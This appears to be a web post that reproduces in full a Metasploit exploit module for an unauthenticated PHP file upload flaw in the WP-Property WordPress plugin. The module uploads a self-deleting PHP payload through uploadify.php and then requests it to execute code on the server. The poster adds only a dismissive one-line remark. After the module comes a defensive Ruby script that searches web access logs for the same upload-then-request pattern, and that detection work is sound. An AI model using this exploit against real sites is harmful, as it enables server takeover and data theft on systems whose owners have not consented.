WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end

Don't ask me what this is or how to use it; all I'm saying is: msf.

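
For defenders, the request pattern of the module above (a POST to uploadify.php followed by a GET for a script in the same directory) can be searched for in web server access logs. The Ruby sketch below is an added example, not part of the original post or of Metasploit; the Combined Log Format, the sample log lines, the `KNOWN_FILES` inventory and all function names are assumptions made for illustration.

```ruby
# Added example: triage access logs for the upload-then-request pattern.
UPLOADIFY_DIR = 'wp-content/plugins/wp-property/third-party/uploadify/'
# Assumption: extend this with the files the installed plugin really ships.
KNOWN_FILES = ['uploadify.php'].freeze
SCRIPT_EXT  = /\.(php\d?|phtml)\z/i

# Combined Log Format: ip - - [time] "METHOD path PROTO" status size ...
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) /

def parse_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  { ip: m[:ip], time: m[:time], method: m[:method],
    path: m[:path].split('?', 2).first, status: m[:status].to_i }
end

# Returns one finding per POST to uploadify.php and per request for a script
# in the uploadify directory that is not in the known inventory.
def find_uploadify_abuse(lines)
  posters = {} # client IPs that have already POSTed to uploadify.php
  lines.each_with_object([]) do |line, findings|
    req = parse_line(line)
    next unless req
    idx = req[:path].index(UPLOADIFY_DIR)
    next unless idx
    file = req[:path][(idx + UPLOADIFY_DIR.length)..-1]
    if file == 'uploadify.php'
      next unless req[:method] == 'POST'
      posters[req[:ip]] = true
      findings << req.merge(kind: :upload_attempt)
    elsif file =~ SCRIPT_EXT && !KNOWN_FILES.include?(file)
      findings << req.merge(kind: :unknown_script,
                            after_upload: posters.key?(req[:ip]))
    end
  end
end

# Constructed sample lines (documentation IP ranges), not real traffic.
base = '/wordpress/' + UPLOADIFY_DIR
SAMPLE_LOG = [
  %(198.51.100.7 - - [04/Jan/2013:19:40:01 +0800] "GET #{base}uploadify.php HTTP/1.1" 200 0 "-" "-"),
  %(198.51.100.7 - - [04/Jan/2013:19:40:02 +0800] "POST #{base}uploadify.php HTTP/1.1" 200 71 "-" "-"),
  %(198.51.100.7 - - [04/Jan/2013:19:40:03 +0800] "GET #{base}QwErT.php HTTP/1.1" 200 0 "-" "-"),
  %(203.0.113.9 - - [04/Jan/2013:19:41:00 +0800] "GET /wordpress/index.php HTTP/1.1" 200 5120 "-" "-")
].freeze

find_uploadify_abuse(SAMPLE_LOG).each { |f| puts f.inspect } if $PROGRAM_NAME == __FILE__
```

Because the module builds its payload with `:unlink_self=>true`, the uploaded file may no longer be on disk after it runs, so the access log is the more durable evidence.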